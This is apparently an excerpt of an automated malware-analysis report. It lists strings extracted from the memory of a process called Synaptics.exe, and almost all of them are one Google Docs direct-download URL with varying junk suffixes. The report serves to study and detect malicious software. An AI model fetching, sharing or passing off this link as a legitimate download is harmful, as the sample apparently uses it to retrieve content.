                              Source: Synaptics.exe, 00000003.00000002.2445635497.000000000077E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.000000000728C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA7
                              Source: Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAX
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAo
                              Source: Synaptics.exe, 00000003.00000002.2445635497.000000000077E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005AAA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.000000000728C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005AB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB6
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB9
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBD
                              Source: Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBWy
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBn#
                              Source: Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBz
                              Source: Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC:
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCR
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadCo
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000071F6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2759091660.000000000EF58000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005B13000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005A7E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.000000000728C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1613364424.0000000005A82000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1610949341.0000000007203000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD9
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDQ%
                              Source: Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDZ
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE#
                              Source: Synaptics.exe, 00000003.00000003.1612481301.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.00000000071BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadEG
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadEU$
                              Source: Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.00000000072E5000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005AB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadF
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadFE
                              Source: Synaptics.exe, 00000003.00000003.1612481301.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.00000000071BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadFF
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadFT
                              Source: Synaptics.exe, 00000003.00000002.2445635497.000000000077E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005A7E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1613364424.0000000005A82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG5
                              Source: Synaptics.exe, 00000003.00000002.2759091660.000000000EF58000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005A7E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005B02000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1613364424.0000000005A82000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadH
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadH#
                              Source: Synaptics.exe, 00000003.00000003.1612481301.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.00000000071BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadHG
                              Source: Synaptics.exe, 00000003.00000002.2445635497.000000000077E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.000000000728C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI6
                              Source: Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIER
                              Source: Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIWd
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIn(
                              Source: Synaptics.exe, 00000003.00000002.2445635497.000000000077E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005A7E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2463631330.0000000002120000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005AAA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1613364424.0000000005A82000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005AB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ5
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJG
                              Source: Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJx1
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.000000000728C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadK
                              Source: Synaptics.exe, 00000003.00000002.2445635497.00000000007BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadKA
                              Source: Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadKZf
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005A20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadKa
                              Source: Synaptics.exe, 00000003.00000002.2759091660.000000000EF58000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005A7E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.000000000728C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1613364424.0000000005A82000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadL
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadL8
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadLP-
                              Source: Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1612481301.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.00000000072E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadM
                              Source: Synaptics.exe, 00000003.00000003.1612481301.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.00000000071BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadMF
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadMT
                              Source: Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005AAA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005AB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadN
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNH
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNS/
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005A7E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005B02000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1613364424.0000000005A82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadO
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadO%&
                              Source: Synaptics.exe, 00000003.00000003.1612481301.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.00000000071BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadOI
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000071F6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2759091660.000000000EF58000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005A7E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1612481301.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1613364424.0000000005A82000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.00000000072E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadP
                              Source: Synaptics.exe, 00000003.00000003.1612481301.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.00000000071BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPF
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadPTQ
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQ
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQ5
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005A7E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005AAA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1613364424.0000000005A82000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005AB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadR
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadR%
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadR4
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadRE
                              Source: Synaptics.exe, 00000003.00000003.1612481301.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.00000000071BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadRI
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.000000000728C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadS
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadS8
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSPR
                              Source: Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSYn
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005A20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSzK
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000071F6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2759091660.000000000EF58000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.000000000728C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1610949341.0000000007203000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT7
                              Source: Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTXk
                              Source: Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadThNy5
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadToU
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadTs6
                              Source: Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU;
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUST
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUSb_
                              Source: Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUn
                              Source: Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVF
